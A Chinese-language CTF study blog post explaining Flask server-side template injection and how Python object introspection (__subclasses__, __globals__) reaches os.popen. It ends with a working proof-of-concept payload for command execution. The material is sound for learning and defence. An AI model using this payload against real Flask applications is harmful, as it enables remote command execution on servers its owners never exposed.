<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>flask 模板注入 | null</title><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.min.css"><script>var GLOBAL = { 
  root: '/',
  algolia: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  }
} </script><link rel="icon" href="/favicon.ico"><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="null" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-5"><a class="toc-link" href="#之前对于flask模板注入只看了下大概的原理。在buu又遇到了这个题。在这里做一个总结"><span class="toc-number">1.</span> <span class="toc-text">之前对于flask模板注入只看了下大概的原理。在buu又遇到了这个题。在这里做一个总结</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Y0un9</div><div class="author-info__description text-center">Y0un9的博客</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">18</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">1</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(http://attach.bbs.miui.com/forum/201306/23/110328s72xxse7lfis9fnd.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/"></a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a></span></div><div id="post-info"><div id="post-title">flask 模板注入</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-05-13 </time></div></div></div><div class="layout" id="content-inner"><article id="post"><div id="post-content"><h5 id="之前对于flask模板注入只看了下大概的原理。在buu又遇到了这个题。在这里做一个总结"><a href="#之前对于flask模板注入只看了下大概的原理。在buu又遇到了这个题。在这里做一个总结" class="headerlink" title="之前对于flask模板注入只看了下大概的原理。在buu又遇到了这个题。在这里做一个总结"></a>之前对于flask模板注入只看了下大概的原理。在buu又遇到了这个题。在这里做一个总结</h5><p>这位师傅总结得很好，我就再自己实操一遍，加深理解。<br><a href="https://xz.aliyun.com/t/3679" target="_blank" rel="noopener">参考链接</a></p>
<p>模板注入简单来说就是由于代码不规范或信任了用户输入而导致了服务端模板注入&#40;和sql注入很相似&#41;</p>
<p>flask中模板注入最主要的还是使用了render_template_string&#40;template&#41;渲染字符串。如果在模板中有”%&#40;request.url&#41;”这样的语句。&#40;template&#41;就会将&#123;&#123;&#125;&#125;中的语句一起解析，造成注入。而使用render_template&#40;&#41;就可以避免这种情况。原因在于使用render_template&#40;&#41;时，模板已经提前渲染好了，用户恶意传入的&#123;&#123;&#125;&#125;的语句并不会再次解析。</p>
<p><strong>接下来是利用的方法</strong></p>
<p>在python中，object类是Python中所有类的基类，如果定义一个类时没有指定继承哪个类，则默认继承object类。例如我们打印一下””的基类</p>
<p>1.<code>__class__</code>  可以得到一个对象的类型</p>
<p><code>print(&quot;&quot;.__class__)</code><br>得到结果：<code>&lt;class &#39;str&#39;&gt;</code></p>
<p>2.<code>__bases__</code>得到一个对象的基类</p>
<p><code>print(&quot;&quot;.__class__.__bases__)</code> 得到结果：<code>&lt;class &#39;object&#39;&gt;</code></p>
<p>3.<code>__mro__</code> 列出解析方法调用的顺序</p>
<p><code>print(&quot;&quot;.__class__.__mro__)</code><br>得到结果：<code>&lt;class &#39;str&#39;&gt;, &lt;class &#39;object&#39;&gt;</code> 即先解析str类，再解析object类。</p>
<p>4.<code>__subclasses__()</code> 返回一个类的子类</p>
<p><code>print(&quot;&quot;.__class__.__bases__[0].__subclasses__())</code></p>
<p>得到结果<code>[&lt;class &#39;type&#39;&gt;, &lt;class &#39;weakref&#39;&gt;, &lt;class &#39;weakcallableproxy&#39;&gt;, &lt;class &#39;weakproxy&#39;&gt;, &lt;class &#39;int&#39;&gt;, &lt;class &#39;bytearray&#39;&gt;, &lt;class &#39;bytes&#39;&gt;, &lt;class &#39;list&#39;&gt;, &lt;class &#39;NoneType&#39;&gt;.....(还有很多就不全部列举了)</code></p>
<p>在这些子类中，我们可以找到一个有趣的模块–os。而os模块中有调用系统shell的方法，我们可以据此执行命令。</p>
<p>可以利用如下代码找到与os有关的子类的位置</p>
<p><code>a = &#39;&#39;.__class__.__bases__[0].__subclasses__()
for index, value in enumerate(a):
    value = str(value)  # 返回的为type类型。需要转化为数值型才能迭代
    if &#39;os.&#39; in value:
        print(index)
        print(value)</code></p>
<p>得到结果<br><code>133&lt;class &#39;os._wrap_close&#39;&gt;134&lt;class &#39;os._AddedDllDirectory&#39;&gt;</code></p>
<p>在os._wrap_close中，有我们喜闻乐见的函数–popen&#40;&#41;</p>
<p>最后的poc:</p>
<p><code>print(&#39;&#39;.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[&#39;popen&#39;](&#39;cmd&#39;).read())</code></p>
<p>其中<code>__init</code>用于初始化类。<code>__globals__</code>全局来查找所有的方法及变量及参数。</p>
</div><div class="post-meta__tag-list"></div></article><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/05/15/WesternCTF2018-shrine/"><i class="fa fa-chevron-left">  </i><span>[WesternCTF2018]shrine</span></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">©2013 - 2020 By Y0un9</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span> |  </span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="/js/third-party/anime.min.js"></script><script src="/js/third-party/jquery.min.js"></script><script src="/js/third-party/jquery.fancybox.min.js"></script><script src="/js/third-party/velocity.min.js"></script><script src="/js/third-party/velocity.ui.min.js"></script><script src="/js/utils.js"></script><script src="/js/fancybox.js"></script><script src="/js/sidebar.js"></script><script src="/js/copy.js"></script><script src="/js/fireworks.js"></script><script src="/js/transition.js"></script><script src="/js/scroll.js"></script><script src="/js/head.js"></script></body></html>